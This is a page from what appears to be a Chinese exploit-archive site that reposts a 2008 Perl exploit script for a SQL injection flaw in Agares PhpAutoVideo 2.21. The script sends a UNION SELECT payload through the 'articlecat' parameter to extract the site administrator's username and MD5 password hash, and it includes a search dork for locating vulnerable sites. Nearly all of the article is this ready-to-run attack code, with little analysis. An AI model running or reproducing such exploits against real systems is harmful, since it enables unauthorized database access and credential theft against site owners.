首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection Exploit
来源:Gr33tz-Team.org 作者:Pr0metheus 发布时间:2008-01-14  
#!/usr/bin/perl
#Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection Exploit
#Bug Found by ka0x ( http://milw0rm.org/exploits/4901 ).. but sql injection works if we include in index.php bug file with sql injection..like this :
#http://192.168.1.102/video/UPLOAD/index.php?loadpage=./includes/articleblock.php&articlecat=[SQL]
#So.. we can execute sql query and we have user admin & pass in MD5
#Exploit by Pr0metheus
#Gr33tz to Gr33tz-Team.org
#Dork : "powered by AMCMS3"
###############################################
use LWP::UserAgent;
if(@ARGV!=3){
print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "Agares PhpAutoVideo 2.21 Remote Sql Injection\n";
print "perl $0 <site> <path> <prefix>\n";
    print "default prefix - amcms\n";
print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
}
($site,$path,$prefix)=@ARGV;
$file  = "index.php?loadpage=./includes/articleblock.php&articlecat=";
$query = "1+and+1=2+UNION+SELECT+userkey,username,password,4,5,6,7,8,9,10+from+".$prefix."_users+where+userkey=1/*";
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => "".$site."".$path."".$file."".$query."");
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
$con = $res->content;
if($con =~ /<p>(.*)<\/p>/){
$p = $1;
print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "Agares PhpAutoVideo 2.21 Remote Sql Injection\n\n";
print "[+] Admin Pass : ".$p."\n";

if($con =~/">(.*)<\/a><\/h1>/){
$u = $1;
print "[+] Admin Username : ".$u."\n";
print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";

}
else{
print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "Agares PhpAutoVideo 2.21 Remote Sql Injection\n\n";
print "[+] Exploit Failed...\n";
print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
}
}
else{
print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "Agares PhpAutoVideo 2.21 Remote Sql Injection\n\n";
print "[+] Exploit Failed...\n";
print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NUVICO DVR NVDV4 / PdvrAtl Mod
·Quicktime Player <= 7.3.1.70 H
·photokron <= 1.7 (update scrip
·X7 Chat <= 2.0.5 (day) Remote
·0DayDB 2.3 (delete id) Remote
·Xforum 1.4 (topic) Remote SQL
·Evilsentinel <= 1.0.9 (multipl
·Macrovision FlexNet DownloadMa
·SunOS 5.10 Remote ICMP Kernel
·Microsoft Message Queue POC ex
·Cisco VPN Client IPSec Driver
·Docebo <= 3.5.0.3 (lib.regset.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved